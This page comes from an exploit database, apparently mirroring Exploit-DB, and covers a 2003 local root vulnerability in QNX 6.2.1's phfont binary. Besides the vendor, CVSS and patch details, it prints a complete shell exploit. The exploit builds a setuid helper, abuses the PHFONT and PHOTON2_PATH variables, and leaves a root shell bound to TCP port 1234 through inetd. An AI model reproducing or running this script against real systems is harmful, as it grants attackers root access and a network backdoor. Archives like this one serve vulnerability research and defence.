header-logo
Suggest Exploit
vendor:
QNX 6.2.1
by:
kokanin
7.2
CVSS
HIGH
Local Privilege Escalation
78
CWE
Product Name: QNX 6.2.1
Affected Version From: QNX 6.2.1
Affected Version To: QNX 6.2.1
Patch Exists: YES
Related CWE: N/A
CPE: o:qnx:qnx_6.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: QNX 6.2.1
2006

QNX 6.2.1 phfont Local Root Exploit

This exploit is for a local privilege escalation vulnerability in the phfont binary of QNX 6.2.1. The vulnerability is due to a lack of proper input validation when handling environment variables. By setting the PHFONT and PHOTON2_PATH environment variables, an attacker can execute arbitrary code with root privileges.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

#!/bin/sh
# word, exploit for http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
# greetings and salutations from www.lort.dk
# kokanin@dtors 18/10/2003
# $ cksum /usr/photon/bin/phfont
# 4123428723      30896 /usr/photon/bin/phfont
# $ uname -a
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86 
cat > phfontphf.c << __EOF__
int main(){
setuid(0);
system("echo 1234 stream tcp nowait root  /bin/sh       sh -i>/tmp/dsr && /usr/sbin/inetd /tmp/dsr");
} 
__EOF__
make phfontphf >/dev/null
ln -s /usr/photon/bin/phfont ./phfont
export PHFONT=hello
export PHOTON2_PATH=mom
./phfont
rm phfont*

# milw0rm.com [2006-02-08]

Navigation

Suggest Exploit

Services By CQR